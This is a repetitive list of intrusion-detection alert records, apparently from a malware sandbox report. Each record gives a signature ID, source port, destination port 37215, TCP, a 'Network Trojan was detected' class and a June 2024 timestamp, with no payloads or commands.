          SID:2829579
          Source Port:42216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155243
          SID:2835222
          Source Port:43632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273085
          SID:2829579
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508765
          SID:2829579
          Source Port:53132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667490
          SID:2835222
          Source Port:45388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354483
          SID:2835222
          Source Port:57804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409502
          SID:2835222
          Source Port:49116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911915
          SID:2835222
          Source Port:42848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191824
          SID:2829579
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350946
          SID:2835222
          Source Port:49220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075570
          SID:2835222
          Source Port:37794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509713
          SID:2829579
          Source Port:47902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178699
          SID:2829579
          Source Port:45050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242374
          SID:2835222
          Source Port:43286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162784
          SID:2835222
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896335
          SID:2835222
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174168
          SID:2835222
          Source Port:49122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402564
          SID:2835222
          Source Port:41432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606500
          SID:2829579
          Source Port:38178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511617
          SID:2835222
          Source Port:33226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884308
          SID:2829579
          Source Port:46866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039105
          SID:2829579
          Source Port:43380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744666
          SID:2829579
          Source Port:56430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893892
          SID:2829579
          Source Port:46026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274648
          SID:2835222
          Source Port:39658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730549
          SID:2835222
          Source Port:38068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731038
          SID:2829579
          Source Port:38644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133730
          SID:2835222
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449410
          SID:2835222
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808066
          SID:2835222
          Source Port:48814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891807
          SID:2829579
          Source Port:55414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261007
          SID:2829579
          Source Port:51516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302479
          SID:2829579
          Source Port:43896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396142
          SID:2835222
          Source Port:39208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242861
          SID:2835222
          Source Port:53270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021388
          SID:2829579
          Source Port:36236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811003
          SID:2829579
          Source Port:46186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087987
          SID:2829579
          Source Port:40372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354568
          SID:2829579
          Source Port:40198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667121
          SID:2829579
          Source Port:42624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896415
          SID:2835222
          Source Port:57964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274604
          SID:2829579
          Source Port:48594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743316
          SID:2829579
          Source Port:54060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708176
          SID:2835222
          Source Port:40414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884209
          SID:2829579
          Source Port:38738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832321
          SID:2835222
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019760
          SID:2835222
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447193
          SID:2835222
          Source Port:35848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449248
          SID:2829579
          Source Port:45874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.814139
          SID:2835222
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787742
          SID:2835222
          Source Port:54670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444680
          SID:2835222
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799357
          SID:2835222
          Source Port:37954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730832
          SID:2829579
          Source Port:42790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444582
          SID:2835222
          Source Port:41266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673795
          SID:2835222
          Source Port:51306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551345
          SID:2835222
          Source Port:45682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832992
          SID:2829579
          Source Port:58708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855157
          SID:2829579
          Source Port:49070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175107
          SID:2835222
          Source Port:60094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799897
          SID:2835222
          Source Port:59208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708300
          SID:2835222
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.791948
          SID:2829579
          Source Port:40906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888696
          SID:2835222
          Source Port:51780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405756
          SID:2829579
          Source Port:59976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456117
          SID:2835222
          Source Port:41978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018441
          SID:2829579
          Source Port:33826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259768
          SID:2835222
          Source Port:38266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462290
          SID:2835222
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109080
          SID:2835222
          Source Port:40590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787821
          SID:2829579
          Source Port:53282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811103
          SID:2829579
          Source Port:41084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188376
          SID:2835222
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547348
          SID:2835222
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175377
          SID:2829579
          Source Port:50634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606087
          SID:2835222
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056182
          SID:2835222
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888079
          SID:2829579
          Source Port:51016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731081
          SID:2835222
          Source Port:40472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884035
          SID:2829579
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600199
          SID:2829579
          Source Port:36314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791663
          SID:2835222
          Source Port:41028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822931
          SID:2829579
          Source Port:39694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159976
          SID:2835222
          Source Port:44048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843659
          SID:2829579
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741002
          SID:2829579
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128734
          SID:2835222
          Source Port:49412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153899
          SID:2829579
          Source Port:40398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353238
          SID:2829579
          Source Port:37224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355058
          SID:2829579
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669654
          SID:2835222
          Source Port:43968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709146
          SID:2835222
          Source Port:47964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734916
          SID:2829579
          Source Port:42324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154837
          SID:2829579
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160411
          SID:2835222
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891168
          SID:2829579
          Source Port:38618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148533
          SID:2835222
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440652
          SID:2829579
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467688
          SID:2835222
          Source Port:51132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810803
          SID:2835222
          Source Port:38386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159819
          SID:2835222
          Source Port:32932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542569
          SID:2835222
          Source Port:50478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514967
          SID:2829579
          Source Port:34890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448724
          SID:2829579
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132949
          SID:2829579
          Source Port:42624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746846
          SID:2829579
          Source Port:42726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447206
          SID:2829579
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805142
          SID:2835222
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403994
          SID:2835222
          Source Port:49632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730585
          SID:2829579
          Source Port:58582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158084
          SID:2829579
          Source Port:43328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108874
          SID:2829579
          Source Port:38266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862310
          SID:2835222
          Source Port:33934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703532
          SID:2829579
          Source Port:46806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174789
          SID:2835222
          Source Port:34048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403747
          SID:2835222
          Source Port:39234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267705
          SID:2829579
          Source Port:41100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404504
          SID:2829579
          Source Port:53110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862966
          SID:2835222
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792157
          SID:2835222
          Source Port:40396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512676
          SID:2835222
          Source Port:53062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601961
          SID:2835222
          Source Port:35706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016134
          SID:2829579
          Source Port:54152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806940
          SID:2829579
          Source Port:37714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465137
          SID:2829579
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273387
          SID:2829579
          Source Port:46192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784145
          SID:2829579
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791787
          SID:2829579
          Source Port:44566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106874
          SID:2835222
          Source Port:38474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268673
          SID:2829579
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545591
          SID:2829579
          Source Port:33820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670362
          SID:2835222
          Source Port:40762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355135
          SID:2829579
          Source Port:57496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466905
          SID:2829579
          Source Port:37044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155537
          SID:2835222
          Source Port:40232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175988
          SID:2835222
          Source Port:58910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056460
          SID:2835222
          Source Port:34958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669653
          SID:2835222
          Source Port:50894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467460
          SID:2829579
          Source Port:43754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732984
          SID:2829579
          Source Port:33594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151282
          SID:2829579
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495817
          SID:2829579
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896355
          SID:2829579
          Source Port:49992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175181
          SID:2829579
          Source Port:55754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745204
          SID:2829579
          Source Port:56650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741339
          SID:2835222
          Source Port:49690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861773
          SID:2835222
          Source Port:48274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152693
          SID:2829579
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112487
          SID:2835222
          Source Port:35108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834307
          SID:2835222
          Source Port:34392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896914
          SID:2829579
          Source Port:52994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015748
          SID:2835222
          Source Port:33524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897326
          SID:2829579
          Source Port:58448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405272
          SID:2829579
          Source Port:43822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035568
          SID:2835222
          Source Port:37328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179567
          SID:2829579
          Source Port:56996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672275
          SID:2835222
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168297
          SID:2835222
          Source Port:39748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044109
          SID:2829579
          Source Port:34598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014735
          SID:2829579
          Source Port:56538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860040
          SID:2829579
          Source Port:34582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740378
          SID:2835222
          Source Port:59416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264025
          SID:2829579
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160433
          SID:2835222
          Source Port:53156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449472
          SID:2829579
          Source Port:49584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514742
          SID:2835222
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510613
          SID:2829579
          Source Port:48632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837120
          SID:2835222
          Source Port:46084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113872
          SID:2829579
          Source Port:39178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894861
          SID:2835222
          Source Port:53868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264519
          SID:2835222
          Source Port:33962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555389
          SID:2829579
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043462
          SID:2829579
          Source Port:43638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604093
          SID:2829579
          Source Port:39782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164323
          SID:2835222
          Source Port:53958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242591
          SID:2829579
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787246
          SID:2829579
          Source Port:48490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152272
          SID:2835222
          Source Port:35584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745487
          SID:2835222
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793273
          SID:2829579
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042104
          SID:2829579
          Source Port:50002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747882
          SID:2835222
          Source Port:42152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110406
          SID:2835222
          Source Port:52790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185598
          SID:2829579
          Source Port:57242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780602
          SID:2835222
          Source Port:43876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109313
          SID:2829579
          Source Port:59118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043042
          SID:2835222
          Source Port:56824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355462
          SID:2829579
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545923
          SID:2829579
          Source Port:43398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796282
          SID:2829579
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600282
          SID:2835222
          Source Port:38768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270930
          SID:2835222
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808161
          SID:2835222
          Source Port:52654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827712
          SID:2829579
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111062
          SID:2829579
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673043
          SID:2829579
          Source Port:35190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742422
          SID:2829579
          Source Port:52886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299566
          SID:2835222
          Source Port:46146
          Destination Port:37215
